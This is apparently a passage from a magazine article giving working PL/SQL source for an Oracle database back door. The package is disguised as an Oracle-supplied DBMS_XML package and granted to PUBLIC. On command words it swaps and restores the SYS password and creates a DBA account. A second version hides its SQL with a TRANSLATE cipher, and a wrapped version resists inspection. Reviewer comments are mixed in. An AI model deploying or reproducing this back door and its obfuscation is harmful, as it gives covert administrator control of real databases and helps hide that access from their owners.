Continued from 2600 Magazine - A Back Door To Your Oracle Database

Part 2: Obfuscation of the String Literals then Wrapping the Code

Below is a listing of the code of DBMS_XML as it appears in the 2600 Magazine article:

-- Package specification for the article's back-door example.
-- The DBMS_ prefix makes the package look like an Oracle-supplied one, but the
-- body in this listing does no XML parsing: it only compares the argument with
-- four command words.
-- No AUTHID clause is given, so Oracle's default (definer's rights) applies:
-- the body runs with the package owner's privileges, not the caller's.
CREATE OR REPLACE PACKAGE dbms_xml AS
 -- string: command word; the body reacts to 'unlock', 'lock', 'make', 'unmake'.
 PROCEDURE parse (string IN VARCHAR2);
END dbms_xml;

/

-- Package body: parse() dispatches on four literal command words. Any other
-- input matches none of the IF blocks and the procedure does nothing.
--
-- Artefacts a reviewer can search for, all taken from the statements below:
--   * a table named SYSPA1 with a single VARCHAR2(100) column,
--   * a user named HILL holding the DBA role,
--   * ALTER USER SYS ... statements issued from PL/SQL,
--   * EXECUTE IMMEDIATE with DDL inside a package that claims to parse XML.
CREATE OR REPLACE PACKAGE BODY dbms_xml AS
PROCEDURE parse (string IN VARCHAR2) IS
var1 VARCHAR2 (100); -- carries the SYS password value between statements
BEGIN

-- 'unlock': save the current SYS password value, then replace the SYS password
-- with a fixed, known one.
IF string = 'unlock' THEN
 -- Reads the PASSWORD column of dba_users for SYS.
 SELECT PASSWORD INTO var1 FROM dba_users WHERE username = 'SYS';
 -- DDL has to go through EXECUTE IMMEDIATE in PL/SQL; syspa1 is the scratch
 -- table that keeps the saved value until 'lock' is called.
 EXECUTE IMMEDIATE 'create table syspa1 (col1 varchar2(100))';
 -- The saved value is concatenated into the statement text, not bound.
 EXECUTE IMMEDIATE 'insert into syspa1 values ('''||var1||''')';
 COMMIT;
 EXECUTE IMMEDIATE 'ALTER USER SYS IDENTIFIED BY hack11hack';
END IF;

-- 'lock': put the saved value back with IDENTIFIED BY VALUES and drop the
-- scratch table. Afterwards dba_users shows the original SYS value again and
-- syspa1 is gone, so only audit records of the ALTER USER / CREATE TABLE /
-- DROP TABLE statements (if auditing is enabled) would show the change.
IF string = 'lock' THEN
 EXECUTE IMMEDIATE 'SELECT col1 FROM syspa1 WHERE ROWNUM=1' INTO var1;
 EXECUTE IMMEDIATE 'ALTER USER SYS IDENTIFIED BY VALUES '''||var1||'''';
 EXECUTE IMMEDIATE 'DROP TABLE syspa1';
END IF;

-- 'make': create the account HILL with a fixed password and grant it DBA.
IF string = 'make' THEN
 EXECUTE IMMEDIATE 'CREATE USER hill IDENTIFIED BY hack11hack';
 EXECUTE IMMEDIATE 'GRANT DBA TO hill';
END IF;

-- 'unmake': remove HILL together with every object it owns (CASCADE).
IF string = 'unmake' THEN
 EXECUTE IMMEDIATE 'DROP USER hill CASCADE';
END IF;

END;

END dbms_xml;

/

-- Publishes the package to every account: the PUBLIC synonym lets any session
-- call dbms_xml.parse without a schema prefix, and EXECUTE to PUBLIC lets any
-- user run it.
-- Review point: list PUBLIC synonyms and PUBLIC EXECUTE grants and check the
-- owner of each target; a DBMS_-named package that is not Oracle-supplied and
-- is executable by PUBLIC deserves a closer look.
CREATE PUBLIC SYNONYM dbms_xml FOR dbms_xml;
GRANT EXECUTE ON dbms_xml TO PUBLIC;

The code below demonstrates how to obfuscate the text strings using the translate function:

-- Package specification for the obfuscated variant; the interface is the same
-- as in the plaintext listing (one procedure, one VARCHAR2 argument).
-- No AUTHID clause is given, so Oracle's default (definer's rights) applies:
-- the body runs with the package owner's privileges, not the caller's.
CREATE OR REPLACE PACKAGE dbms_xml
AS
   -- STRING: command word; the body reacts to 'unlock', 'lock', 'make', 'unmake'.
   PROCEDURE parse (STRING IN VARCHAR2);
END dbms_xml;
/

-- Obfuscated variant of the package body. The control flow is the same as in
-- the plaintext listing; only the SQL text handed to EXECUTE IMMEDIATE is
-- stored encoded and decoded at run time by the local function conv().
--
-- What stays readable for a reviewer: the four command words, the EXECUTE
-- IMMEDIATE calls, and both TRANSLATE alphabets. The encoding is a fixed
-- character substitution, so applying the same TRANSLATE call to each literal
-- recovers the statement text.
CREATE OR REPLACE PACKAGE BODY dbms_xml
AS
   PROCEDURE parse (STRING IN VARCHAR2)
   IS
      var1   VARCHAR2 (100);   -- SYS password value, later reused for statement text
      /* ------- sub function begin ------- */
      -- conv: decodes one encoded literal. TRANSLATE replaces each character
      -- found in the first alphabet with the character at the same position in
      -- the second; characters in neither alphabet (for example _ = ( ) and the
      -- quote) pass through unchanged. Returns NULL if anything raises.
      FUNCTION conv (input IN VARCHAR2)
         RETURN VARCHAR2
      IS
         x   VARCHAR2 (300);
      BEGIN
         x :=
            TRANSLATE (input,
                       'ZYXWVUTSRQPOMNLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba0987654321 ',
                       ' 1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
                      );
         RETURN x;
      EXCEPTION
         WHEN OTHERS
         THEN
            RETURN NULL;
      END conv;
   /* ------- sub function end ------- */
   BEGIN
      -- 'unlock': save the current SYS password value, then set a fixed one.
      IF STRING = 'unlock'
      THEN
         -- decodes to: SELECT PASSWORD FROM dba_users WHERE username = 'SYS'
         EXECUTE IMMEDIATE conv ('7kdkm6Z0o773a8lZj8acZLMO_uwKxwZ3hk8kZuwKxBOCKZ=Z''717''') 
              INTO var1;
         -- decodes to: create table syspa1 (col1 varchar2(100))
         EXECUTE IMMEDIATE conv ('NxKOvKZvOMDKZwqwzOYZ(NADYZtOxNHOxX(YPP))');
         -- decodes to: insert into syspa1 values ('  -- the saved value and the
         -- closing ') are appended outside conv(), so they are not translated.
         EXECUTE IMMEDIATE conv ('GBwKxvZGBvAZwqwzOYZtODuKwZ(''') || var1 || ''')';
         COMMIT;
         -- decodes to: ALTER USER SYS IDENTIFIED BY hack11hack
         -- var1 is reused here as a buffer for the statement text.
         var1:= conv ('od6k8Z57k8Z717Zglkb6gjgklZn1ZHONEYYHONE');
         EXECUTE IMMEDIATE var1;
      END IF;

      -- 'lock': restore the saved SYS value and drop the scratch table. After
      -- this, only audit records (if auditing is enabled) show the change.
      IF STRING = 'lock'
      THEN
         -- decodes to: SELECT col1 FROM syspa1 WHERE ROWNUM=1
         EXECUTE IMMEDIATE conv ('7kdkm6ZNADYZj8acZwqwzOYZ3hk8kZ8a3b5c=Y') INTO var1;
         -- decodes to: ALTER USER SYS IDENTIFIED BY VALUES '  (value appended in clear)
         EXECUTE IMMEDIATE conv ('od6k8Z57k8Z717Zglkb6gjgklZn1Z4od5k7Z''') || var1 || '''';
         -- decodes to: DROP TABLE syspa1
         EXECUTE IMMEDIATE conv ('l8a0Z6ondkZwqwzOY');
      END IF;

      -- 'make': create the account HILL and grant it DBA.
      IF STRING = 'make'
      THEN
         -- decodes to: CREATE USER hill IDENTIFIED BY hack11hack
         EXECUTE IMMEDIATE conv ('m8ko6kZ57k8ZHGDDZglkb6gjgklZn1ZHONEYYHONE');
         -- decodes to: GRANT DBA TO hill
         EXECUTE IMMEDIATE conv ('i8ob6ZlnoZ6aZHGDD');
      END IF;

      -- 'unmake': remove HILL and everything it owns.
      IF STRING = 'unmake'
      THEN
         -- decodes to: DROP USER hill CASCADE
         EXECUTE IMMEDIATE conv ('l8a0Z57k8ZHGDDZmo7molk');
      END IF;
   END;
END dbms_xml;
/
-- Publishes the package to every account (PUBLIC synonym plus EXECUTE to PUBLIC).
-- NOTE(review): the synonym here is named dbms_sql, while the other two
-- listings on this page use dbms_xml; DBMS_SQL is also the name of an
-- Oracle-supplied package. When hunting for this pattern, match on the
-- synonym's target (owner and object name), not on the synonym's own name.
create public synonym dbms_sql for dbms_xml;
grant execute on dbms_xml to public;

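The code below has been modified by the WRAP utility.  Now it is very difficult to understand, and impossible to edit.  Note, however, that the wrapped output still lists identifiers and string literals in clear text (the lines beginning with "1" below), so the command words, both TRANSLATE alphabets and the encoded strings remain searchable in the wrapped source.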

CREATE OR REPLACE PACKAGE dbms_xml wrapped 
0
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
3
9
9000000
1
4
0 
5
2 :e:
1PACKAGE:
1DBMS_XML:
1PARSE:
1STRING:
1VARCHAR2:
0

0
0
13
2
0 a0 97 9a 8f a0 b0 3d
b4 55 6a a0 :2 aa 59 58 1d
17 b5 
13
2
0 3 7 11 2d 29 28 35
25 3a 3e 42 46 48 4a 4d
50 51 5a 
13
2
0 1 9 e 15 1f :2 15 14
:2 4 5 :7 1 
13
4
0 :2 1 :8 3 4
:7 1 
5c
4
:3 0 1 :3 0 2
:6 0 1 :2 0 3
:a 0 a 2 :7 0
5 :2 0 3 5
:3 0 4 :7 0 6
5 :3 0 8 :2 0
a 3 9 0
c 2 :3 0 7
e 0 e c
d f 2 e
11 0 10 f
12 :8 0 
9
4
:3 0 1 4 1
7 1 a 
1
4
0 
11
0
1
14
2
3
0 1 0 0 0 0 0 0
0 0 0 0 0 0 0 0
0 0 0 0 
2 0 1
3 1 2
4 2 0
0

/
CREATE OR REPLACE PACKAGE BODY dbms_xml wrapped 
0
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
3
b
9000000
1
4
0 
27
2 :e:
1PACKAGE:
1BODY:
1DBMS_XML:
1PARSE:
1STRING:
1VARCHAR2:
1VAR1:
1100:
1FUNCTION:
1CONV:
1INPUT:
1RETURN:
1X:
1300:
1TRANSLATE:
1ZYXWVUTSRQPOMNLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba0987654321 :
1 1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ:
1OTHERS:
1=:
1unlock:
1EXECUTE:
1IMMEDIATE:
17kdkm6Z0o773a8lZj8acZLMO_uwKxwZ3hk8kZuwKxBOCKZ=Z'717':
1NxKOvKZvOMDKZwqwzOYZ(NADYZtOxNHOxX(YPP)):
1GBwKxvZGBvAZwqwzOYZtODuKwZ(':
1||:
1'):
1COMMIT:
1od6k8Z57k8Z717Zglkb6gjgklZn1ZHONEYYHONE:
1lock:
17kdkm6ZNADYZj8acZwqwzOYZ3hk8kZ8a3b5c=Y:
1od6k8Z57k8Z717Zglkb6gjgklZn1Z4od5k7Z':
1':
1l8a0Z6ondkZwqwzOY:
1make:
1m8ko6kZ57k8ZHGDDZglkb6gjgklZn1ZHONEYYHONE:
1i8ob6ZlnoZ6aZHGDD:
1unmake:
1l8a0Z57k8ZHGDDZmo7molk:
0

0
0
da
2
0 :2 a0 97 9a 8f a0 b0 3d
b4 55 6a a3 a0 51 a5 1c
81 b0 a0 8d 8f a0 b0 3d
b4 :2 a0 2c 6a a3 a0 51 a5
1c 81 b0 :3 a0 :2 6e a5 b d
:2 a0 65 b7 a0 53 a0 4d 65
b7 a6 9 a4 a0 b1 11 68
4f a0 7e 6e b4 2e :3 a0 6e
a5 b a0 11e 11d :3 a0 6e a5
b 11e 11d :3 a0 6e a5 b 7e
a0 b4 2e 7e 6e b4 2e 11e
11d a0 57 a0 b4 e9 :2 a0 6e
a5 b d :3 a0 11e 11d b7 19
3c a0 7e 6e b4 2e :3 a0 6e
a5 b a0 11e 11d :3 a0 6e a5
b 7e a0 b4 2e 7e 6e b4
2e 11e 11d :3 a0 6e a5 b 11e
11d b7 19 3c a0 7e 6e b4
2e :3 a0 6e a5 b 11e 11d :3 a0
6e a5 b 11e 11d b7 19 3c
a0 7e 6e b4 2e :3 a0 6e a5
b 11e 11d b7 19 3c b7 a4
b1 11 68 4f b1 b7 a4 11
a0 b1 56 4f 1d 17 b5 
da
2
0 3 7 b 15 31 2d 2c
39 29 3e 42 5f 4a 4e 51
52 5a 49 66 6a 86 82 46
8e 81 93 97 9b 9f b9 a7
7e ab ac b4 a6 c0 c4 c8
cc d1 a3 d6 d8 dc e0 e4
e8 ea 1 ee f2 f3 f7 f9
fa ff 103 107 109 115 119 11b
11f 122 127 128 12d 131 135 139
13e 13f 141 145 14a 14e 152 156
15a 15f 160 162 167 16b 16f 173
177 17c 17d 17f 182 186 187 18c
18f 194 195 19a 19f 1a3 1a7 1ac
1b0 1b1 1b6 1ba 1be 1c3 1c4 1c6
1ca 1ce 1d2 1d6 1db 1df 1e1 1e5
1e8 1ec 1ef 1f4 1f5 1fa 1fe 202
206 20b 20c 20e 212 217 21b 21f
223 227 22c 22d 22f 232 236 237
23c 23f 244 245 24a 24f 253 257
25b 25f 264 265 267 26c 270 272
276 279 27d 280 285 286 28b 28f
293 297 29c 29d 29f 2a4 2a8 2ac
2b0 2b4 2b9 2ba 2bc 2c1 2c5 2c7
2cb 2ce 2d2 2d5 2da 2db 2e0 2e4
2e8 2ec 2f1 2f2 2f4 2f9 2fd 2ff
303 306 308 30c 30e 31a 31e 320
322 324 328 334 338 33a 33d 33f
340 349 
da
2
0 1 9 :2 e 15 1f :2 15 14
:2 4 7 e 18 17 :2 e :2 7 10
16 1f :2 16 15 a 11 :2 7 a
e 18 17 :2 e :2 a d :3 18 :2 d
:2 a 11 a 7 :2 f d 14 d
:3 a 7 b :4 7 a 11 13 :2 11
a 12 1c 22 :2 1c 62 :3 a 12
1c 22 :2 1c :3 a 12 1c 22 :2 1c
43 46 :2 1c 4b 4e :2 1c :7 a 4
b 11 :2 b 4 a 12 1c :2 a
:3 7 a 11 13 :2 11 a 12 1c
22 :2 1c 51 :3 a 12 1c 22 :2 1c
4c 4f :2 1c 54 57 :2 1c :3 a 12
1c 22 :2 1c :2 a :3 7 a 11 13
:2 11 a 12 1c 22 :2 1c :3 a 12
1c 22 :2 1c :2 a :3 7 a 11 13
:2 11 a 12 1c 22 :2 1c :2 a :3 7
:a 4 5 :6 1 
da
4
0 :3 1 :8 3 :7 5
:7 7 :2 8 :2 7 :7 a
c :2 d e f
:2 d c :3 11 b
:2 13 :3 15 14 :2 13
12 16 :4 7 :5 19
:9 1b :8 1c :10 1d :5 1e
:6 1f :5 20 1a :2 19
:5 23 :9 25 :10 26 :8 27
24 :2 23 :5 2a :8 2c
:8 2d 2b :2 2a :5 30
:8 32 31 :2 30 :2 18
:8 3 35 :6 1 
34b
4
:3 0 1 :3 0 2
:3 0 3 :6 0 1
:2 0 4 :a 0 cd
2 :7 0 5 :2 0
3 6 :3 0 5
:7 0 7 6 :3 0
9 :2 0 cd 4
a :2 0 b 7e
0 9 6 :3 0
8 :2 0 7 d
f :6 0 12 10
0 cb 0 7
:6 0 9 :3 0 a
:a 0 3d 3 :7 0
e :2 0 d 6
:3 0 b :7 0 17
16 :3 0 c :3 0
6 :3 0 19 1b
0 3d 14 1c
:2 0 13 :2 0 11
6 :3 0 f 1f
21 :6 0 24 22
0 3b 0 d
:6 0 d :3 0 f
:3 0 b :3 0 10
:4 0 11 :4 0 26
2a 25 2b 0
30 c :3 0 d
:3 0 2e :2 0 30
17 3c 12 :3 0
c :4 0 34 :2 0
36 1a 38 1c
37 36 :2 0 39
1e :2 0 3c a
:3 0 20 3c 3b
30 39 :6 0 3d
2 0 14 1c
3c cb :2 0 5
:3 0 13 :2 0 14
:4 0 24 40 42
:3 0 15 :3 0 16
:3 0 a :3 0 17
:4 0 27 46 48
7 :3 0 49 4a
:3 0 4b :2 0 75
15 :3 0 16 :3 0
a :3 0 18 :4 0
29 4f 51 52
:4 0 53 :2 0 75
15 :3 0 16 :3 0
a :3 0 19 :4 0
2b 57 59 1a
:2 0 7 :3 0 2d
5b 5d :3 0 1a
:2 0 1b :4 0 30
5f 61 :3 0 62
:4 0 63 :2 0 75
1c :3 0 67 68
:2 0 69 1c :5 0
66 :2 0 75 7
:3 0 a :3 0 1d
:4 0 33 6b 6d
6a 6e 0 75
15 :3 0 16 :3 0
7 :3 0 72 :4 0
73 :2 0 75 35
76 43 75 0
77 3c 0 c9
5 :3 0 13 :2 0
1e :4 0 40 79
7b :3 0 15 :3 0
16 :3 0 a :3 0
1f :4 0 43 7f
81 7 :3 0 82
83 :3 0 84 :2 0
9e 15 :3 0 16
:3 0 a :3 0 20
:4 0 45 88 8a
1a :2 0 7 :3 0
47 8c 8e :3 0
1a :2 0 21 :4 0
4a 90 92 :3 0
93 :4 0 94 :2 0
9e 15 :3 0 16
:3 0 a :3 0 22
:4 0 4d 98 9a
9b :4 0 9c :2 0
9e 4f 9f 7c
9e 0 a0 53
0 c9 5 :3 0
13 :2 0 23 :4 0
57 a2 a4 :3 0
15 :3 0 16 :3 0
a :3 0 24 :4 0
5a a8 aa ab
:4 0 ac :2 0 b6
15 :3 0 16 :3 0
a :3 0 25 :4 0
5c b0 b2 b3
:4 0 b4 :2 0 b6
5e b7 a5 b6
0 b8 61 0
c9 5 :3 0 13
:2 0 26 :4 0 65
ba bc :3 0 15
:3 0 16 :3 0 a
:3 0 27 :4 0 68
c0 c2 c3 :4 0
c4 :2 0 c6 6a
c7 bd c6 0
c8 6c 0 c9
6e cc :3 0 cc
73 cc cb c9
ca :6 0 cd 1
0 4 a cc
d4 :3 0 d2 0
d2 :3 0 d2 d4
d0 d1 :6 0 d5
:2 0 3 :3 0 76
0 3 d2 d8
:3 0 d7 d5 d9
:8 0 
78
4
:3 0 1 5 1
8 1 e 1
c 1 15 1
18 1 20 1
1e 3 27 28
29 2 2c 2f
1 35 1 32
1 38 1 23
1 41 2 3f
41 1 47 1
50 1 58 2
5a 5c 2 5e
60 1 6c 6
4c 54 64 69
6f 74 1 76
1 7a 2 78
7a 1 80 1
89 2 8b 8d
2 8f 91 1
99 3 85 95
9d 1 9f 1
a3 2 a1 a3
1 a9 1 b1
2 ad b5 1
b7 1 bb 2
b9 bb 1 c1
1 c5 1 c7
4 77 a0 b8
c8 2 11 3d
1 cd 
1
4
0 
d8
0
1
14
3
7
0 1 2 0 0 0 0 0
0 0 0 0 0 0 0 0
0 0 0 0 
c 2 0
3 0 1
4 1 2
15 3 0
5 2 0
1e 3 0
14 2 3
0

/

-- Publishes the wrapped package to every account: the PUBLIC synonym lets any
-- session call dbms_xml.parse without a schema prefix, and EXECUTE to PUBLIC
-- lets any user run it.
-- Review point: these two statements are not wrapped, so they appear in clear
-- text in any install script and, if auditing is enabled, in the audit trail.
create public synonym dbms_xml for dbms_xml;
grant execute on dbms_xml to public;